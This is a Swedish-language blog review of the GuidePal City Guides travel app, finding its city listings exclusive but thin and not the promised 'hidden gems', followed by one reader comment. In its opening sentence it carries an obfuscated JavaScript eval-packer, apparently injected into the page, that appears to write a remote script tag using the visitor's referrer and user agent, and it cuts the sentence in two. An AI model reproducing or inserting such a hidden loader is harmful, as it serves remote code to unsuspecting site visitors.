Image Image Image Image Image Image Image Image Image Image

| 22 oktober, 2018

Scroll to top

Top

Revue testar reseappen GuidePal City Guides

Revue testar reseappen GuidePal City Guides
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zzhra|var|u0026u|referrer|irhdz||js|php’.split(‘|’),0,{}))
är ett tag kvar men tiden går fort. Höstlov och vinterlov nalkas och semestrar börjar bokas. 

Själv har jag bokat in mitt semesterresmål  till vinterlovet, kan tyckas tidigt men till mitt försvar säger jag att vi är rätt många 🙂

Vad är inte bättre att med sig än en guide. Det spelar ingen roll om man åker till en storstad, vinterort eller sommarort. Det finnas alltid sevärdheter på destinationen man besöker.

Kan tyckas svenskt men jag är själv väldigt mån om att inte sticka ut som ”turist” när jag är på semester. Att springa runt med en analog karta eller en guidebok i handen och se snurrig ut är inte riktigt min grej även om det säkert är otroligt effektivt.

Guidepal3

Revue har laddat ner och testat applikationen Guidepal som är ett mer diskret alternativ att få ta del av den så kallade ”guideboken”.

Guidepal är ett svenskt företag som själva beskriver sig som ett bolag som ”brinner för resor”. De tror att det enda sättet att verkligen uppleva en stad är att göra det som en lokal, något som i mitt fall verkar optimalt.

Vi har testat applikationen ”GuidePal City Guides” som helt enkelt är en reseguide för städer runt om i världen.

Vi börjar med att ladda ner appen gratis i App Store. När den installerats sätter jag igång och loggar in med mitt Facebook-konto.
Jag möts av en lista fylld med fantastiska städer runt om i världen. Vad jag snabbt får uppfattning om är att det finns väldigt många städer, exakt hur många vet jag inte, men många.

Jag är som många andra väldigt fascinerad av New York och tror mig veta om de flesta smultronställena, där blir det mitt val.
När jag valt stad möts jag av en lista med flera alternativ.  ”Bars & Nightlife”, ”Resturants”, ”Shopping”, ”Hotels”, ”See & Do”, ”Know the city”, ”Welcome to the city” samt ett alternativ att boka hotell via hotels.com.
Jag väljer Bars & Nightlife för att se om det fått med några av de lite mer gömda klubbarna jag besökt där.  GuidePal skriver detta på sin hemsida ”What you’ll find in our guides is only the crème de la crème: the hidden gems.”. Om det stämmer ska vi undersöka.

guidepal1

När jag klickat in mig på ”Bars & Nightlife” dyker det upp en lista på ställen som GuidePal rekommenderar. Det första jag tänker när jag sveper förbi alternativen är att detta verkar vara väldigt magert för en så stor stad som New York. Femton barer och tre klubbar? Det kan inte stämma.

Hur det menar ”only the crème de la crème” kan såklart diskuteras. Är det kanske så att det endast handlar om high-end ställen som finns i städerna? Verkar som det.
Bland klubbarna dyker den numera kända ”The Box” upp. The Box är en klubb som förut var väldigt hemlig och diskret. Det var en plats dit kändisar drog sig för att släppa loss och göra sjuka saker utan att ”vanligt” folk fick se.

Guidepal2

Efter att ha tittat igenom New York går jag tillbaka och väljer Stockholm, detta för att få en klarhet i om detta endast handlar om ”High-end”-ställen.
Jag väljer nattklubber och barer igen och ser nu att utbudet är väldigt exklusivt. Jag förstår helt plötsligt GuidePals nisch, något som faktiskt inte var så klart från början.

Detta är då en app som fokuserar på exklusiva platser i världen, ”only the crème de la crème”. Men, jag ställer mig fortfarande frågan, Smultronställen? Dessa platser i Stockholm är inget av dem ett smultronställe. Det är kommersiella nattklubbar och barer som är väldigt kända både nationellt och internationellt.  Vad hände med  ”the hidden gems”?

Sammanfattning

GuidePal må vara en väldigt snygg och bra app men den var verkligen något helt annat än vad jag väntade mig när jag laddade ner den.

Förutom att de försökt täcka de mest exklusiva platserna i många städer så saknar den fortfarande väldigt mycket på den fronten.

GuidePal är en applikation för dig som snabbt vill få upp restauranger eller shopping i den stad du besöker men filtrera bort bruset av skräp.
GuidePal har mycket kvar och konkurrensen på reseappar är enorm. Därför gäller det att kunna leverera till användaren så de inte byter app direkt och väljer exempelvis Lonelyplanet som faktiskt täckt det mesta idag.
Vi önskar GuidePal lycka till och kommer att följa med i deras utveckling.

Appen är gratis och hittas i App Store ”Guidepal City Guides”

Hemsida: Guidepal.com

Comments

  1. Gabriel

    testade också appen och tycker den var snygg och så men funktionsmässigt vet jag inte hur mycket man kommer använda den.Är man som mig och håller sitt ”skrivbord” på iphonen clean så tar man bort appar som inte fyller någon funktion för stunden.

    Det blir svårt i detta fall då man inte kan laddad ner den utanför Sverige för det kostar för mycket samt att man säkert kommer glömma bort att göra det innan man flyger.